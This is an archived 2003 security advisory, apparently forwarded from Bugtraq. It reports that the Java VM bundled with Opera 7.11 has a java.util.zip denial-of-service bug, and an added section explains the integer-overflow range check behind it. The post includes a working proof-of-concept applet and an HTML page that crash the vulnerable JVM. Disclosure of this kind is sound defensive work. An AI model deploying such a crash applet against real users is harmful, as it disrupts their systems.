[VulnWatch] Opera 7.11 java.util.zip.* Vulnerability (fwd)

From: Marc Schoenefeld (schonef_at_uni-muenster.de)
Date: 05/11/03

    Date: Sun, 11 May 2003 01:48:54 +0200 (MES)
    To: vulnwatch@vulnwatch.org
    
    

    ---------- Forwarded message ----------
    Date: Sun, 11 May 2003 01:28:59 +0200 (MES)
    From: Marc Schoenefeld <schonef@uni-muenster.de>
    To: bugtraq@securityfocus.com
    Subject: Opera 7.11 java.util.zip.* Vulnerability

    Hi,

    The just-released Opera 7.11j comes with a Java VM (1.4.1_01)
    that is vulnerable to the java.util.zip.* bugs
    that can cause denial of service via Java applets
    like the one whose source is printed below.
    Therefore my suggestion to the Opera deployment
    team is to bundle Java 1.4.1_02, which is not vulnerable
    to the java.util.zip bugs.
    All 1.3.1 versions are still vulnerable!
    If you already installed Java 1.4.1_02 prior to
    installing Opera, you are not vulnerable, because
    the most current JVM seems to be chosen by Opera
    when running applets.
    If you are interested in the details (not Opera-specific),
    read the whole story at www.illegalaccess.org or read:

    http://developer.java.sun.com/developer/bugParade/bugs/4811913.html
    http://developer.java.sun.com/developer/bugParade/bugs/4812181.html
    http://developer.java.sun.com/developer/bugParade/bugs/4812006.html
    http://developer.java.sun.com/developer/bugParade/bugs/4811927.html
    http://developer.java.sun.com/developer/bugParade/bugs/4811917.html

    Sincerely
    Marc Schoenefeld

    The applet code:
    ========CRCApplet.java=======================
    import java.applet.Applet;
    import java.awt.Graphics;

    public class CRCApplet extends Applet {
        public void paint(Graphics g) {
            // Empty array with an offset/length pair far outside its bounds
            (new java.util.zip.CRC32()).update(new byte[0], Integer.MAX_VALUE - 3, 4);
        }
    }
    =============================================

    The corresponding HTML
    =======CRCApplet.html======================
    <html>
    <body>
    <applet code=CRCApplet.class width=400 height=400>
    </applet>
    </body>
    </html>
    ===========================================

    --
    Never be afraid to try something new. Remember, amateurs built the
    ark; professionals built the Titanic. -- Anonymous
    Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
    [ PGP Signature ok - Sun May 11 01:48:14 MES 2003 ]
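
Added example, not part of the original post and not code from Sun or Opera: the offset and length passed by CRCApplet sum past Integer.MAX_VALUE, so a range check that computes off + len in int arithmetic sees a negative sum and lets the call through to whatever code actually reads the buffer. The class and method names are hypothetical, and the naive check is a constructed illustration of that failure mode, not the JVM's actual source.

```java
// Added illustration; hypothetical names, not Sun's or Opera's code.
public class RangeCheckDemo {

    // Constructed, overflow-prone check: off + len is evaluated in 32-bit
    // int arithmetic and can wrap around to a negative value.
    static boolean naiveAccepts(int bufLen, int off, int len) {
        return off >= 0 && len >= 0 && off + len <= bufLen;
    }

    // Overflow-safe form: with bufLen >= 0 and len >= 0 the subtraction
    // bufLen - len cannot wrap, so no out-of-range pair is accepted.
    static boolean safeAccepts(int bufLen, int off, int len) {
        return off >= 0 && len >= 0 && off <= bufLen - len;
    }

    public static void main(String[] args) {
        // Constructed test cases: {buffer length, offset, length}
        int[][] cases = {
            {0, Integer.MAX_VALUE - 3, 4}, // arguments used by CRCApplet
            {16, 4, 12},                   // exactly fills the buffer
            {16, 4, 13},                   // one byte past the end
            {16, -1, 4},                   // negative offset
        };
        for (int[] c : cases) {
            System.out.printf(
                "bufLen=%d off=%d len=%d off+len=%d naive=%b safe=%b%n",
                c[0], c[1], c[2], c[1] + c[2],
                naiveAccepts(c[0], c[1], c[2]),
                safeAccepts(c[0], c[1], c[2]));
        }
    }
}
```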
    
